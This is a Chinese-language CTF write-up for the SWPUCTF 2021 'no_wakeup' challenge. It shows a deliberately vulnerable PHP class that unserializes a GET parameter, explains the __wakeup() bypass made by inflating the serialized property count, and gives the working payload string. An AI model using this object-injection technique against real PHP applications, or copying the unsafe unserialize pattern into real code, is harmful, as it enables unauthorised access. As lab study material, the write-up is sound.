本文最后更新于 2024-10-28T21:26:13+08:00
前期我们先以题带学,进行一下熟悉
例题1 [SWPUCTF 2021 新生赛]no_wakeup
直接看到源码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
| <?php
header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");
class HaHaHa{
public $admin;
public $passwd;
public function __construct(){
$this->admin ="user";
$this->passwd = "123456";
}
public function __wakeup(){
$this->passwd = sha1($this->passwd);
}
public function __destruct(){
if($this->admin === "admin" && $this->passwd === "wllm"){
include("flag.php");
echo $flag;
}else{
echo $this->passwd;
echo "No wake up";
}
}
}
$Letmeseesee = $_GET['p'];
unserialize($Letmeseesee);
?>
|
经过wp发现,在调用反序列化时,会自动执行_wakeip()导致passwd被sha1加密,并且不可逆,所以我们要考虑_wakeip()的让绕过
- 知识点:php特性,当反序列化字符串中,表示对象属性个数的值大于真实属性个数时,会跳过__wakeup()函数的执行。
$aa = new HaHaHa();
$aa->admin = "admin";
$aa->passwd = "wllm";
$stus = serialize($aa);
print_r($stus);
O:6:”HaHaHa”:2:{s:5:”admin”;s:5:”admin”;s:6:”passwd”;s:4:”wllm”;}
序列化之后我们可以改变参数数量,上传即可
O:6:”HaHaHa”:3:{s:5:”admin”;s:5:”admin”;s:6:”passwd”;s:4:”wllm”;}